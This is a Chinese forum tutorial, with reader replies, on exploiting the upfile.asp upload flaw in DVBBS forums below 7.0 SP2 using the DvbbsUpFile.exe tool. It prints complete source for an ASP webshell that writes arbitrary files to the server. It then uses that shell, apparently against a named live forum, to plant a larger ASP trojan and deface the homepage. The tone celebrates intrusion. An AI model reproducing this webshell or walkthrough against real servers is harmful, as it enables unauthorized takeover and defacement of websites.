文章作者：pchoer
文章备注：文章有图 但是不影响 而且原始连接也没有传图片

最近刚刚在闹“震荡波”的蠕虫，，没有想到，这么快又有新的漏洞玩了，，而且还是超级大牌型的，呵呵~~~真是幸福了我们这些黑友`：），为什么说动网的这个大呢？？因为，网上有很多的网站都在用这个论坛，不过这个漏洞只对DVBBS7.0 SP2版本以下的存在，不过没有关系，DVBBS7.0 SP2才刚出，用的肯定也不多，呵呵``一但有漏洞的话，上传个asp木马上去，改改首页拉，下数据库拉，，都是小菜了，有办法的话还是要拿到服务器的权限才爽~西西```，，好了， 说了废话半天，天都快亮了。下面开始入侵吧，

拿出DvbbsUpFile.exe，这个东东的说明？：

本程序是根据动网upfile.asp文件所存在的漏洞而编写的.

原理是由用户可自定义上传路径,我们通过构造特殊的路径.

而实现直接上传ASP木马.

本程序要上传的ASP木马请放到与EXE文件相同目录下,请命名为
Newmm.asp,在界面中输入地址(HOST)与生成的文件名(Create FileName)
其它的基本上不用更改,点击Send Data按纽即可.

在最下面的文件框中，你会看到服务器相应的返回信息.
是否上传成功，你可以从返回信息中看到.

简单的说，就是它已经帮我们构造好所要发送的伪造的数据包了，我们所要做的只是填上所要攻击的论坛的域名，web的端口，upfile.asp文件的位置，和我们的asp木马在肉鸡上的名字就可以了！，，好的我们去搜索一个论坛来实验一下。找到了：http://www.shuangge.com/bbs/index.asp 好的，填入论坛的域名，web的端口，upfile.asp文件的位置，和我们的asp木马在肉鸡上的名字，我基本都没有改变。如图：

提醒：Newmm.asp的大小最好小一点的，我这里用的是一个可以在服务器上生成.asp文件的asp木马，代码如下：
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))<>"" then %>
<% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write "<font color=red>save Success!</font>" %>
<% else %>
<% response.write "<font color=red>Save UnSuccess!</font>" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write "<form action= method=post>" %>
<% Response.write "保存文件的<font color=red>绝对路径(包括文件名:如D:\web\x.asp):</font>" %>
<% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>
<% Response.Write "<br>" %>
<% Response.write "本文件绝对路径" %>
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
<% Response.write "<br>" %>
<% Response.write "输入马的内容:" %>
<% Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %>
<% Response.write "<input type=submit value=保存>" %>
<% Response.write "</form>" %>
copy以后保存为Newmm.asp就可以了。
好了以后，我们点senddata。如果成功的话，大家会看到在最后有一句话：
<script>parent.document.forms[0].myface.value=uploadFace/ok.asp
2a
图片上传成功,请copy下边的图片连接,以备后用

西西~~~上传成功了，下面我们来打开：http://www.shuangge.com/bbs/uploadFace/ok.asp
将会看到如下的画面：


。，接着，，我们把他的首页改了，西西```
先把海洋的asp木马建立在服务器上：输入服务器上我们的海洋asp木马的路径，再copy海洋asp木马的原代码，如图：

好了以后，点饥保存。会看到save Success!证明保存成功了。我们再来打开：http://www.shuangge.com/bbs/uploadFace/hao.asp
嘿嘿`~`熟悉吧```我们的海洋asp木马就这么上去了。
先来看看对方的首页的位置，一般都是index.asp或是index.html的``，
再黑之前，先打开他的首页看看：
呵呵``做得还可以嘛````。找一下他的主页路径，OK了：入图：
那我们就自己做一和他的文件名一样的文件传上去覆盖就可以了。
大家可以看看我的结果截图~~哈哈``：

文章不错，但是我看不太明白。真是笨呀。  哎~！！

我希望在网络上能有一位好心的大哥哥可以带带我。
我的联系方式： QQ：133886880 MSN：hackcq@hotmail.com E-MAIL：hackcq@163.com
加我的时候注明： 陈少

顶......但我也不会吖.........伤心....................

像我这个菜鸟，电脑知识都是自学来的，大脑里的东西也是东拼西凑，对一些概念模糊不清、一知半解，很希望能看到一些基础的，准确的，详细的技术资料！

虽然够老了~~~
但一个DV+servU的服务器，常常就这样被人拿下系统权限~~~
唉~~~
是这个漏洞的普遍性+servU溢出，创造了无数换人主页的“黑客”。
希望大家找到有漏洞的 DVBBS一定帮他打好补丁~~~